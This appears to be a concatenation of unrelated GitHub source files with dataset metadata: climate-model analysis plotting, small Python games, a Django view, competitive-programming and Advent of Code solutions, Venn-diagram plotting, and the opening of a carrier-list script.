'/home/h02/tcrocker/code/EUCP_WP5_Lines_of_Evidence/shape_files/ne_110m_land/ne_110m_land.shp'\n ).unary_union()\n # need to reduce size of lsm to avoid bug in ascend\n # see https://github.com/MetOffice/ascend/issues/8\n corners = [(-30, 20), (-30, 75), (50, 75), (50, 20)]\n rectangle = shape.create(corners, {'shape': 'rectangle'}, 'Polygon')\n lsm = lsm.intersection(rectangle)\n\n # process each file for the required datatype\n fnames = glob(f\"{input_path}/{proj}_*.nc\")\n\n values = {}\n\n for fname in fnames:\n # ignore diff or mean files\n if any([s in fname for s in ['diff', 'mean']]):\n continue\n\n # load data\n cube = iris.load_cube(fname)\n\n # check proportion of area covered by valid cube data\n # ignore data if this is less than 1\n # i.e. 
there is not data for the whole of the shape\n area_cov = check_data_shape_intersection(cube, area)\n if area_cov < 0.9:\n print(f\"WARNING: Data in {os.path.basename(fname)} only covers {area_cov * 100}% of supplied area\")\n continue\n if area_cov < 1.0:\n print(f\"WARNING: Data in {os.path.basename(fname)} only covers {area_cov * 100}% of supplied area\")\n\n # now mask data\n # could also achieve maskng via preprocessor functions from esmvaltool \n # if it is necesary to run this outside the met office where ascend is not available\n if use_lsm:\n mask = lsm.intersection(area)\n mask.mask_cube_inplace(cube)\n else:\n mask = area\n\n # and compute weighted area average\n # this is using weighted area weights from Ascend\n awts = mask.cube_2d_weights(cube, False)\n nwts = iris.analysis.cartography.area_weights(cube)\n\n wts = awts.data * nwts\n area_mean = cube.collapsed(['longitude', 'latitude'], iris.analysis.MEAN, weights=wts)\n\n # get model name etc. from filename\n # want everything between the type and anom i.e.\n # type_<this bit>_anom_season.nc\n mname = os.path.basename(fname).split(f\"{proj}_\")[1]\n mname = mname.split(\"_anom\")[0]\n\n values[mname] = area_mean.data.item()\n\n return values\n\n\ndef check_data_shape_intersection(cube, shp):\n # return proportion of grid boxes in shp (when put on same grid as cube)\n # that have valid corresponding data in cube\n\n # check cube has a coord system, if not add one\n if cube.coord('longitude').coord_system is None:\n cube.coord('longitude').coord_system = iris.coord_systems.GeogCS(6371229.0)\n cube.coord('latitude').coord_system = iris.coord_systems.GeogCS(6371229.0)\n\n # first check intersection of cube bounding box with shape\n # i.e. if the shape doesn't lie entirely inside the cube\n # bounds we can return false immediately\n int = shape.cube_bbox_shape_intersection(cube, shp)\n diff = shp.difference(int)\n if diff.data.area > 0.0:\n return 0.0\n\n # now check intersection of cube data mask with shape\n shape_mask = shp.cube_2d_weights(cube).data\n data_mask = np.invert(cube.data.mask)\n\n data_shape_intersection = shape_mask * data_mask\n\n valid_boxes = np.sum(data_shape_intersection) / np.sum(shape_mask)\n\n return valid_boxes\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"recipe\")\n parser.add_argument(\"variable\")\n parser.add_argument(\"season\")\n parser.add_argument(\"gcm_anoms_recipe\")\n parser.add_argument(\"area_name\")\n parser.add_argument(\"--shape_file\")\n args = parser.parse_args()\n\n recipe = args.recipe\n var = args.variable\n season = args.season\n area = args.area_name\n anoms_files = f\"/net/home/h02/tcrocker/code/EUCP_WP5_Lines_of_Evidence/esmvaltool/esmvaltool_output/{args.gcm_anoms_recipe}/work/global_tas_anomalies/anomalies/\"\n shp_file = args.shape_file\n\n if area == \"boe\":\n area = shape.create([(-5,42), (30,42), (30,52), (-5,52)], {'shape': 'rectangle', 'NAME': 'boe'}, 'Polygon')\n use_lsm = True\n elif area == \"berthou\":\n area = shape.create([(-12,49), (21,49), (21,59), (-12,59)], {'shape': 'rectangle', 'NAME': 'berthou'}, 'Polygon')\n use_lsm = False\n else:\n print(f\"Loading {area} shape from {shp_file}\")\n area = shape.load_shp(shp_file, name=area)[0]\n use_lsm = True\n\n # read data and place in a dataframe\n plot_df = pd.DataFrame(columns=[\"model\", \"value\", \"project\", \"data type\"])\n\n # easiest way seems to be to append a row at a time\n for proj in [\"CMIP5\", \"CMIP6\", \"CORDEX\", \"cordex-cpm\", \"UKCP18 land-gcm\", \"UKCP18 
land-rcm\"]:\n data_dict = load_esmval_gridded_data(recipe, var, proj, area, season, use_lsm)\n for k, v in data_dict.items():\n row = [k, v, proj, \"standard\"]\n plot_df.loc[len(plot_df)] = row\n\n # load gcm temp anoms\n anoms = {}\n for p in [\"CMIP5\", \"CMIP6\", \"UKCP18\"]:\n csv_file = f\"{anoms_files}{p}_global_tas_anom.csv\"\n anoms[p] = pd.read_csv(csv_file, header=None, dtype={0:'string'})\n\n # now loop over values loaded and construct the temp weighted anomaly\n for row in anoms[p].iterrows():\n # get the appropriate model value\n if p == \"UKCP18\":\n proj = \"UKCP18 land-gcm\"\n else:\n proj = p\n m_val = plot_df[(plot_df[\"model\"] == row[1][0]) & (plot_df[\"project\"] == proj)][\"value\"].values\n if len(m_val) == 0:\n continue\n if len(m_val) > 1:\n raise ValueError(f\"Found multiple entries for {row[1][0]}\")\n\n m_val = m_val[0]\n\n # compute the weighted anomaly\n # i.e. we divide by the global anomaly to get degrees of warming\n # per 1 degree of global warming\n weighted_anom = m_val / row[1][1]\n\n # now add new row in the datframe with the weighted info\n new_row = [row[1][0], weighted_anom, proj, \"weighted\"]\n plot_df.loc[len(plot_df)] = new_row\n\n\n # List of models for Romania case study\n # niculita_model_list = [\n # 'RCA4 MPI-M-MPI-ESM-LR',\n # 'RCA4 MOHC-HadGEM2-ES',\n # 'RCA4 ICHEC-EC-EARTH',\n # 'RCA4 CNRM-CERFACS-CNRM-CM5',\n # 'REMO2009 MPI-M-MPI-ESM-LR',\n # 'RACMO22E MOHC-HadGEM2-ES',\n # 'RACMO22E ICHEC-EC-EARTH', \n # 'HIRHAM5 ICHEC-EC-EARTH',\n # ]\n\n # list of models with evolving aerosols. See table B2 from:\n # Gutiérrez, C., Somot, S., Nabat, P., Mallet, M., Corre, L., Van Meijgaard, E., et al. (2020). Future evolution of surface solar radiation and photovoltaic potential in Europe: investigating the role of aerosols. Environmental Research Letters, 15(3). 
https://doi.org/10.1088/1748-9326/ab6666\n aerosol_model_list = []\n for c in plot_df[plot_df[\"project\"] == \"CORDEX\"][\"model\"]:\n if any([s in c for s in ['RACMO22E', 'ALADIN', 'HadREM3']]):\n aerosol_model_list.append(c)\n\n # case_study_model_list = aerosol_model_list\n # case_study_model_list = niculita_model_list\n case_study_model_list = []\n\n # This dictionary maps CPM string to a RCM GCM string\n cpm_drivers = {\n 'CNRM-AROME41t1': 'ALADIN63 CNRM-CERFACS-CNRM-CM5',\n 'CLMcom-CMCC-CCLM5-0-9': 'CCLM4-8-17 ICHEC-EC-EARTH',\n 'HCLIMcom-HCLIM38-AROME': 'HCLIMcom-HCLIM38-ALADIN ICHEC-EC-EARTH',\n 'GERICS-REMO2015': 'REMO2015 MPI-M-MPI-ESM-LR',\n 'COSMO-pompa': 'CCLM4-8-17 MPI-M-MPI-ESM-LR',\n 'ICTP-RegCM4-7-0': 'ICTP-RegCM4-7-0 MOHC-HadGEM2-ES',\n 'ICTP-RegCM4-7': 'ICTP-RegCM4-7-0 MOHC-HadGEM2-ES',\n 'KNMI-HCLIM38h1-AROME': 'KNMI-RACMO23E KNMI-EC-EARTH',\n 'SMHI-HCLIM38-AROME': 'SMHI-HCLIM38-ALADIN ICHEC-EC-EARTH',\n 'HadREM3-RA-UM10.1': 'MOHC-HadGEM3-GC3.1-N512 MOHC-HadGEM2-ES'\n }\n\n # List of CPM drivers from CORDEX to know which to plot as triangles\n cpm_driver_list = []\n for n in plot_df[plot_df[\"project\"] == \"cordex-cpm\"][\"model\"]:\n cpm_driver_list.append(cpm_drivers[n.split()[0]])\n\n # CMIP5 CORDEX drivers can be inferred directly from CORDEX model names\n cordex_driver_list = list(\n set(\n [plotting.remove_institute_from_driver(n.split(' ')[1]) for n in plot_df[plot_df[\"project\"] == \"CORDEX\"][\"model\"]]\n )\n )\n\n driving_models = {\n \"CORDEX\": cordex_driver_list,\n \"CPM\": cpm_driver_list,\n \"UKCP\": list(plot_df[plot_df[\"project\"] == \"UKCP18 land-rcm\"][\"model\"]),\n \"case study\": case_study_model_list\n }\n\n # load WP2 atlas constraint data\n if area.attributes[\"NAME\"] == \"berthou\":\n constraint_data = None\n else: \n constraint_data = {}\n for m in plotting.WP2_METHODS.keys():\n try:\n constraint_data[m] = load_wp2_atlas(m, var, area, season)\n except OSError:\n # Skip method if not available\n continue\n\n # also load Glen's UKCP data\n constraint_data[\"UKMO_CMIP6_UKCP\"] = load_wp2_glen(var, area, season)\n\n # now plot\n # panel plot\n if len(case_study_model_list) > 0:\n case_study = True\n else:\n case_study = False\n plotting.panel_boxplot(plot_df, constraint_data, driving_models, area, season, var, PLOT_PATH, case_study)\n\n # change per degrees of warming plot\n plotting.relative_to_global_plot(plot_df, area, season, var, PLOT_PATH)\n\n # also output dataframe of source data for plots\n plot_df.to_csv(f\"{DATA_PATH}/{area.attributes['NAME']}_{season}_{var}.csv\", index=False)\n\n # scatter plot\n # need to prepare data\n x = plot_df[(plot_df[\"model\"].isin(driving_models[\"CORDEX\"])) & (plot_df[\"data type\"] == \"standard\")][[\"model\", \"value\"]]\n x = pd.Series(x.value.values, index=x.model).to_dict()\n y = plot_df[(plot_df[\"project\"] == \"CORDEX\") & (plot_df[\"data type\"] == \"standard\")][[\"model\", \"value\"]]\n y = pd.Series(y.value.values, index=y.model).to_dict()\n cmip_x, cordex_y, cordex_labels = plotting.prepare_scatter_data(x, y, \"CORDEX\")\n if case_study_model_list == []:\n title = f\"{area.attributes['NAME']} {season} {var}\"\n else:\n title = f\"{area.attributes['NAME']} {season} {var}_cs\"\n\n if len(driving_models[\"CPM\"]) > 0:\n x = plot_df[(plot_df[\"model\"].isin(driving_models[\"CPM\"])) & (plot_df[\"data type\"] == \"standard\")][[\"model\", \"value\"]]\n x = pd.Series(x.value.values, index=x.model).to_dict()\n y = plot_df[(plot_df[\"project\"] == \"cordex-cpm\") & (plot_df[\"data type\"] == 
\"standard\")][[\"model\", \"value\"]]\n y = pd.Series(y.value.values, index=y.model).to_dict()\n cordex_x, cpm_y, cpm_labels = plotting.prepare_scatter_data(x, y, \"CPM\")\n plotting.mega_scatter(\n cmip_x, cordex_y, cordex_x, cpm_y,\n cordex_labels, cpm_labels, title,\n PLOT_PATH\n )\n else:\n plotting.simpler_scatter(\n cmip_x, cordex_y, cordex_labels,\n title,\n PLOT_PATH\n )\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"MetOffice/EUCP_WP5_Lines_of_Evidence","sub_path":"summary_boxplots.py","file_name":"summary_boxplots.py","file_ext":"py","file_size_in_byte":17233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"30334809374","text":"# Kurbağa sınıfı oluşturun\r\nclass Kurbaga:\r\n def __init__(self):\r\n self.konum = [0, 0] # kurbağanın başlangıç konumu\r\n self.yemek = [7, 7] # yemeğin konumu\r\n\r\n def yemek_ye(self):\r\n if self.konum == self.yemek:\r\n print(\"Yemek yeyildi!\")\r\n else:\r\n print(\"Yemek hele tapılmayıb.\")\r\n\r\n def hareket_et(self, x, y):\r\n self.konum[0] += x\r\n self.konum[1] += y\r\n if self.konum[0] < 0:\r\n self.konum[0] = 0\r\n elif self.konum[0] > 7:\r\n self.konum[0] = 7\r\n if self.konum[1] < 0:\r\n self.konum[1] = 0\r\n elif self.konum[1] > 7:\r\n self.konum[1] = 7\r\n\r\n\r\n# Kurbağa ve tahta oluşturun\r\nqurbaga = Kurbaga()\r\ntahta = [[0 for i in range(8)] for j in range(8)]\r\n\r\n# Yemek ve kurbağanın konumunu tahtada işaretleyin\r\ntahta[qurbaga.yemek[0]][qurbaga.yemek[1]] = \"Y\"\r\ntahta[qurbaga.konum[0]][qurbaga.konum[1]] = \"K\"\r\n\r\n# Tahtayı yazdırın\r\nfor i in range(8):\r\n for j in range(8):\r\n print(tahta[i][j], end=\" \")\r\n print()\r\n\r\n# Kurbağanın yemeğe gitmesi\r\nwhile qurbaga.konum != qurbaga.yemek:\r\n x_hareketi = int(input(\"X koordinatında neçə xana ilərləmək istəyirsiniz? \"))\r\n y_hareketi = int(input(\"Y koordinatında neçə xana ilərləmək istəyirsiniz? \"))\r\n qurbaga.hareket_et(x_hareketi, y_hareketi)\r\n tahta = [[0 for i in range(8)] for j in range(8)]\r\n tahta[qurbaga.yemek[0]][qurbaga.yemek[1]] = \"Y\"\r\n tahta[qurbaga.konum[0]][qurbaga.konum[1]] = \"K\"\r\n for i in range(8):\r\n for j in range(8):\r\n print(tahta[i][j], end=\" \")\r\n print()\r\n\r\n# Yemek yendi mesajı yazdırın\r\nqurbaga.yemek_ye()\r\n","repo_name":"backlone/Qurbaga-oyunu-resul","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"12934173071","text":"from django.shortcuts import render\nfrom . 
models import Timeline, Expertise, AboutMe\n\ndef about_me(request):\n about = AboutMe.objects.all()\n timelines = Timeline.objects.all()\n expertise =Expertise.objects.all().order_by('-created_at')\n tls = []\n for i in range(len(timelines)):\n rem = i%2\n tls.append([rem, timelines[i]])\n\n \n context = {\n 'timelines': tls,\n 'experties': expertise,\n 'about' : about\n }\n return render(request, 'about/about.html', context)","repo_name":"Rachanat535/portfolio_web_app","sub_path":"about/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"31148133659","text":"#https://www.codechef.com/OCT19B/problems/MSNG/\nimport sys\nfrom collections import defaultdict\ntry: \n sys.stdin = open('input.txt', 'r') \n sys.stdout = open('output.txt', 'w')\n \nexcept: \n input = sys.stdin.readline\n \n\n\ndef anyBaseToTen(s,base):\n try:\n value=int(s,base)\n if(value>pow(10,12)):\n return -1\n return value\n\n except:\n return -1\n\ndef takeInput():\n return [x for x in input().strip().split() ]\nt=int(input())\nwhile t!=0:\n t-=1\n n=int(input())\n numbers=[]\n some_base_present=False\n for i in range(n):\n base,value=input().strip().split()\n base=int(base) \n if(base!=-1):\n some_base_present=True\n\n numbers.append([base,value])\n\n values=[set() for i in range(n)]\n for i in range(n):\n base,string=numbers[i]\n for b in range(2,37):\n if(base==-1):\n value=anyBaseToTen(string,b)\n else:\n value=anyBaseToTen(string,base)\n\n if(value!=-1):\n values[i].add(value)\n\n \n first_set=sorted(list(values[0]))\n common_element_found=False\n #Search for common elements for all values found and print smallest\n for ele in first_set:\n present=[False for i in range(n)]\n for i in range(n):\n if(ele in values[i]):\n present[i]=True\n\n false_found=False\n for bool_value in present:\n if(not bool_value):\n false_found=True\n break\n \n if(not false_found):\n print(ele)\n common_element_found=True\n break\n \n if(not common_element_found):\n print(-1)\n \n \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"thecodearrow/100-Days-Of-Code","sub_path":"Missing Number.py","file_name":"Missing Number.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"30199389318","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport random\nimport pygame\n\nimport classes.extras as ex\nimport classes.game_driver as gd\nimport classes.level_controller as lc\n\n\nclass Board(gd.BoardGame):\n def __init__(self, mainloop, speaker, config, screen_w, screen_h):\n self.lvlc = mainloop.xml_conn.get_level_count(mainloop.m.game_dbid, mainloop.config.user_age_group)\n self.level = lc.Level(self, mainloop, self.lvlc[0], self.lvlc[1])\n gd.BoardGame.__init__(self, mainloop, speaker, config, screen_w, screen_h, 11, 6)\n\n def create_game_objects(self, level=1):\n self.board.draw_grid = False\n self.allow_unit_animations = False\n self.allow_teleport = False\n self.vis_buttons = [1, 1, 1, 1, 1, 0, 1, 1, 1]\n self.mainloop.info.hide_buttonsa(self.vis_buttons)\n\n # data = [horizontal_number_of_units, bottom_limit, top_limit, number_count, font_size]\n data = [11, 5]\n data.extend(self.mainloop.xml_conn.get_level_data(self.mainloop.m.game_dbid, self.mainloop.config.user_age_group, self.level.lvl))\n self.chapters = self.mainloop.xml_conn.get_chapters(self.mainloop.m.game_dbid,\n self.mainloop.config.user_age_group)\n\n 
self.data = data\n self.layout.update_layout(data[0], data[1])\n self.board.level_start(data[0], data[1], self.layout.scale)\n\n self.unit_mouse_over = None\n self.units = []\n\n self.num_list = []\n if self.mainloop.m.game_variant == 0:\n self.ob_count = data[5]\n for i in range(self.ob_count):\n index = random.randrange(data[3], data[4])\n self.num_list.append(str(index))\n elif self.mainloop.m.game_variant == 1:\n self.num_list2 = []\n\n self.ob_count = data[4]\n\n sign = [\"+\", \"-\"]\n\n for i in range(self.ob_count):\n num1 = random.randrange(1, data[3])\n rand_sign = sign[random.randrange(2)]\n if rand_sign == \"+\":\n while True:\n num2 = random.randrange(0, data[3])\n if num1 + num2 < data[5]:\n break\n else:\n num2 = random.randrange(0, num1)\n expr = str(num1) + rand_sign + str(num2)\n self.num_list.append(expr)\n\n # create table to store 'binary' solution\n self.solution_grid = [0 for x in range(data[0])]\n self.expression = [\"\" for x in range(data[0])]\n\n # find position of first door square\n xd = (data[0] - data[2]) // 2\n\n # add objects to the board\n h = random.randrange(0, 255, 5)\n\n if self.mainloop.scheme is None:\n dc_img_src = os.path.join('unit_bg', \"universal_sq_dc.png\")\n dc_tall_img_src = os.path.join('unit_bg', \"universal_r1x3_dc.png\")\n else:\n dc_img_src = None\n dc_tall_img_src = None\n\n number_color = ex.hsv_to_rgb(h, self.mainloop.cl.bg_color_s, self.mainloop.cl.bg_color_v)\n font_color = [ex.hsv_to_rgb(h, self.mainloop.cl.font_color_s, self.mainloop.cl.font_color_v), ]\n\n bg_img_src = os.path.join('unit_bg', \"universal_sq_bg.png\")\n bg_tall_img_src = os.path.join('unit_bg', \"universal_r1x3_bg.png\")\n\n if self.mainloop.scheme is None:\n door_bg_img_src = os.path.join('unit_bg', \"universal_sq_door.png\")\n else:\n door_bg_img_src = os.path.join('unit_bg', \"universal_sq_door.png\")\n if self.mainloop.scheme.dark:\n door_bg_img_src = os.path.join('unit_bg', \"universal_sq_door_no_trans.png\")\n\n for i in range(0, self.ob_count):\n x2 = xd + i * 2\n caption = self.num_list[i]\n self.board.add_universal_unit(grid_x=x2, grid_y=2, grid_w=1, grid_h=1, txt=caption,\n fg_img_src=None, bg_img_src=bg_img_src, dc_img_src=dc_img_src,\n bg_color=(0, 0, 0, 0), border_color=None, font_color=font_color,\n bg_tint_color=number_color, fg_tint_color=None,\n txt_align=(0, 0), font_type=data[6], multi_color=False, alpha=True,\n immobilized=True, fg_as_hover=False, mode=1)\n self.solution_grid[x2] = 1\n self.expression[x2] = str(self.num_list[i])\n if i < self.ob_count - 1:\n self.solution_grid[x2 + 1] = 1\n\n if h > 125:\n h = random.randrange(0, h - 25, 5)\n else:\n h = random.randrange(h + 25, 255, 5)\n\n number_color = ex.hsv_to_rgb(h, self.mainloop.cl.bg_color_s, self.mainloop.cl.bg_color_v)\n font_color = [ex.hsv_to_rgb(h, self.mainloop.cl.font_color_s, self.mainloop.cl.font_color_v), ]\n fg_number_color = ex.hsv_to_rgb(h, self.mainloop.cl.fg_hover_s, self.mainloop.cl.fg_hover_v)\n\n indu = len(self.board.units)\n inds = len(self.board.ships)\n self.door_indexes = []\n for i in range(0, self.ob_count - 1):\n self.board.add_universal_unit(grid_x=xd + i * 2 + 1, grid_y=1, grid_w=1, grid_h=3, txt=[\">\", \"=\", \"<\"],\n fg_img_src=bg_tall_img_src, bg_img_src=bg_tall_img_src,\n dc_img_src=dc_tall_img_src, bg_color=(0, 0, 0, 0), border_color=None,\n font_color=font_color, bg_tint_color=number_color,\n fg_tint_color=fg_number_color, txt_align=(0, 0), font_type=data[6],\n multi_color=False, alpha=True, immobilized=False, fg_as_hover=True, mode=0)\n\n 
self.units.append(self.board.ships[-1])\n self.board.add_universal_unit(grid_x=xd + i * 2 + 1, grid_y=2, grid_w=1, grid_h=1, txt=\"\",\n fg_img_src=None, bg_img_src=door_bg_img_src, dc_img_src=None,\n bg_color=(0, 0, 0, 0), border_color=None, font_color=None,\n bg_tint_color=(255, 0, 0), fg_tint_color=None,\n txt_align=(0, 0), font_type=data[6], multi_color=False, alpha=True,\n immobilized=True, fg_as_hover=False, mode=2)\n\n self.board.units[indu + i].checkable = True\n self.board.units[indu + i].init_check_images()\n self.door_indexes.append(indu + i)\n self.board.ships[inds + i].readable = False\n self.board.all_sprites_list.move_to_front(self.board.units[indu + i])\n self.changed_since_check = True\n self.outline_all(0, 1)\n\n def show_info_dialog(self):\n self.mainloop.dialog.show_dialog(3, self.d[\"Drag the slider\"])\n\n def auto_check_reset(self):\n for each in self.board.units:\n if each.is_door:\n each.update_me = True\n each.set_display_check(None)\n\n def handle(self, event):\n gd.BoardGame.handle(self, event)\n\n if event.type == pygame.MOUSEBUTTONDOWN:\n self.auto_check_reset()\n if event.type == pygame.MOUSEMOTION or event.type == pygame.MOUSEBUTTONUP:\n self.default_hover(event)\n\n def update(self, game):\n game.fill((255, 255, 255))\n gd.BoardGame.update(self, game)\n\n def check_result(self):\n all_true = True\n for i in range(len(self.board.ships)):\n # calculate the active value based on grid_y of the slider\n value = self.board.ships[i].value[2 - self.board.ships[i].grid_y]\n if value == \"=\":\n value = \"==\"\n self.expression[self.board.ships[i].grid_x] = value\n mini_expression = self.expression[self.board.ships[i].grid_x - 1] + value + self.expression[self.board.ships[i].grid_x + 1]\n if eval(mini_expression) is True:\n self.board.units[self.door_indexes[i]].set_display_check(True)\n else:\n self.board.units[self.door_indexes[i]].set_display_check(False)\n all_true = False\n if all_true:\n self.level.next_board()\n self.mainloop.redraw_needed[0] = True\n\n","repo_name":"imiolek-ireneusz/eduActiv8","sub_path":"game_boards/game032.py","file_name":"game032.py","file_ext":"py","file_size_in_byte":8371,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"81"} +{"seq_id":"25815907883","text":"''' In Part 1, the bottom right of every square is the series of odd numbers squared. The length\nof the square with bottom corner n**2 is n - 1.\n\nTo get the distance from (1), we subtract from the length the remainder of the difference of the number\nfrom the bottom right corner of its square divided by the length of the square.\n\nFor example, 16 is between 9 and 25, so it belongs to the square with 25 at the bottom right corner.\nThere is a difference of 9 between 16 and 25. The remainder of this difference divided by the length\nof the side of the square tells us the position of 16 on the edge of the square it belongs to.\n\nIn this case, 17 is position 0, 16 is position 1, 15 is position 2, 14 is position 3, and 13 is position 4.\n\nWe subtract the position of the number from the length of the edge. This value is 4 for 17, 3 for 15,\n2 for 15, 1 for 14, and 0 for 13. This is only correct for the first half of the the edge\n(position < max_position / 2). 
We correct this calculation for the second half by subtracting this\nvalue from the length of the edge.\n\nSample square:\n# 37 36 35 34 33 32 31\n# 38 17 16 15 14 13 30\n# 39 18 5 4 3 12 29\n# 40 19 6 (1) 2 11 28\n# 41 20 7 8 9 10 27\n# 42 21 22 23 24 25 26\n# 43 44 45 46 47 48 49\n\nSample distance:\n# 6 5 4 3 4 5 6\n# 5 4 3 2 3 4 5\n# 4 3 2 1 2 3 4\n# 3 2 1 (0) 1 2 3\n# 4 3 2 1 2 3 4\n# 5 4 3 2 3 4 5\n# 6 5 4 3 4 5 6\n\n'''\n\nimport numpy as np\n\ndef find_steps(num):\n if num == 1:\n return 1\n\n _sq = round(np.sqrt(num) - 0.5)\n\n if _sq % 2 == 0:\n _min = _sq - 1\n _max = _sq + 1\n else:\n _min = _sq\n _max = _sq + 2\n\n length = _max - 1\n\n steps = length - ((_max - num) % length)\n if steps < length / 2:\n steps = length - steps\n\n return steps\n\ndef get_positions(r):\n # need to build the corners in order\n right_corner = [(r, w) for w in range(1-r, r+1)]\n top_corner = [(w, r) for w in range(r-1, -r-1, -1)]\n left_corner = [(-r, w) for w in range(r-1, -r-1, -1)]\n bottom_corner = [(w, -r) for w in range(1-r, r+1)]\n positions = right_corner + top_corner + left_corner + bottom_corner\n return positions\n\ndef iterate_square(n):\n found = False\n r, val = 1, 1\n grid = {(0, 0): 1}\n neighbors = [(-1, 0), (-1, 1), (0, 1), (1, 1), (1, 0), (1, -1), (0, -1), (-1, -1)]\n\n while not found:\n positions = get_positions(r)\n for p in positions:\n adj_positions = [(p[0] + v[0], p[1] + v[1]) for v in neighbors]\n val = sum([grid[v] for v in adj_positions if v in grid.keys()])\n\n if val > n:\n return val\n else:\n grid[p] = val\n\n r += 1\n\nif __name__ == \"__main__\":\n sol1 = find_steps(368078) # 371\n sol2 = iterate_square(368078) # 369601\n print(f'PART 1: {sol1} \\n PART 2: {sol2}')\n\n\n\n","repo_name":"IAjimi/AdventOfCode","sub_path":"2017/AOC3.py","file_name":"AOC3.py","file_ext":"py","file_size_in_byte":2964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"3142330975","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# @Time :2020-04-12 13:46\r\n# @Author :wangqinghua\r\n# @File : func.py\r\n# @Software : PyCharm\r\n\r\nfor a in range(1,10):\r\n for b in range(1,a+1):\r\n print('%s*%s=%s'%(b,a,b*a),end='\\t')\r\n print('')\r\n\r\naa=[5,15,78,6,48,32,15,9,24]\r\ndef bb(aa):\r\n count=len(aa)\r\n for a in range(0,count):\r\n for b in range(a+1,count):\r\n if aa[a]>aa[b]:\r\n aa[a],aa[b]=aa[b],aa[a]\r\n return aa\r\nprint(bb(aa))","repo_name":"awangqinghua/pythontest","sub_path":"jichuke/test/func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"18045896861","text":"import yaml\nfrom pprint import pprint as pp\n\ntry:\n filename = input('Enter the name of the file')\n\n with open(filename) as file:\n yaml_doc = file.read()\nexcept BaseException:\n print('file not found ending')\n raise BaseException('ENDING NOW')\nelse:\n yaml_dict = yaml.safe_load(yaml_doc)\n\n for status in yaml_dict['TABLE_peersstatus']['ROW_peersstatus']:\n pp(status)\n\n yaml_dict['TABLE_peersstatus']['ROW_peersstatus'].append({'appended_to':'peer_status_row'})\n\n pp(yaml_dict)\n\n yaml_doc = yaml.dump(yaml_dict)\n\n pp(yaml_doc)\n","repo_name":"sjn-network-automation/devasc","sub_path":"yaml_steps.py","file_name":"yaml_steps.py","file_ext":"py","file_size_in_byte":568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"42453791998","text":"import 
os\nimport matplotlib.pyplot as plt\nimport matplotlib_venn as venn\n\nos.chdir(\"/Users/mdsutcliffe/Github/opc_analysis\")\n\nplt.rcParams[\"font.family\"] = \"Arial\"\nplt.rcParams[\"svg.fonttype\"] = \"none\"\nplt.rcParams[\"font.size\"] = 10\nplt.rcParams['pdf.fonttype'] = 42\n\n\nfig = plt.figure(figsize=(4,3))\nv = venn.venn3(subsets = (278,98,110,57,66,0,15),set_labels = (\"DE12_factor\",\"DE12_Female\",\"DE12_Male\"))\nplt.savefig(\"./plots/DE_sex_vs_factor_12.pdf\",transparent = True)\n\nfig = plt.figure(figsize=(4,3))\nv = venn.venn3(subsets = (78,15,14,156,40,2,11),set_labels = (\"DE90_factor\",\"DE90_Female\",\"DE90_Male\"))\nplt.savefig(\"./plots/DE_sex_vs_factor_90.pdf\",transparent = True)\n\nfig = plt.figure(figsize=(6,3))\nv = venn.venn2(subsets = (1041,207,16),set_labels = (\"Female_heterogeneities_12\",\"DE12_Female\"))\nplt.savefig(\"./plots/DE_heterogeneous_12F.pdf\",transparent = True)\nfig = plt.figure(figsize=(6,3))\nv = venn.venn2(subsets = (700,131,7),set_labels = (\"Male_heterogeneities_12\",\"DE12_Male\"))\nplt.savefig(\"./plots/DE_heterogeneous_12M.pdf\",transparent = True)\n\nfig = plt.figure(figsize=(6,3))\nv = venn.venn2(subsets = (1428,36,6),set_labels = (\"Female_heterogeneities_90\",\"DE90_Female\"))\nplt.savefig(\"./plots/DE_heterogeneous_90F.pdf\",transparent = True)\nfig = plt.figure(figsize=(6,3))\nv = venn.venn2(subsets = (838,197,12),set_labels = (\"Male_heterogeneities_90\",\"DE90_Male\"))\nplt.savefig(\"./plots/DE_heterogeneous_90M.pdf\",transparent = True)\n","repo_name":"mdsutcliffe/opc_analysis","sub_path":"new/opcBulk_DESeq2_venn.py","file_name":"opcBulk_DESeq2_venn.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"3262342808","text":"from sys import exit\r\nimport traceback\r\nimport logging\r\nimport getpass\r\nimport random\r\nimport time\r\nimport re\r\nimport os\r\n\r\nimport db_manager\r\nimport navigation\r\nimport scraper\r\n\r\nos.system('color')\r\n# yellow, bright yellow, reset, red, green, bold, blue\r\ny, yb, r, d, g, b, bl = '\\u001b[33m', '\\u001b[33;1m', '\\u001b[0m', '\\u001b[31m', '\\u001b[32m', '\\u001b[1m', '\\u001b[34m'\r\n\r\n# Valid carrier inputs\r\nvalid = ['Alltell', 'ATT', 'Boost', 'Cricket', 'Firstnet', 'GoogleFi', 'MetroPCS', 'Republic', 'Sprint', 'TMobile',\r\n 'USCellular', 'Verizon', 'Virgin']\r\n\r\n# Ensure email is valid\r\nemail_regex = 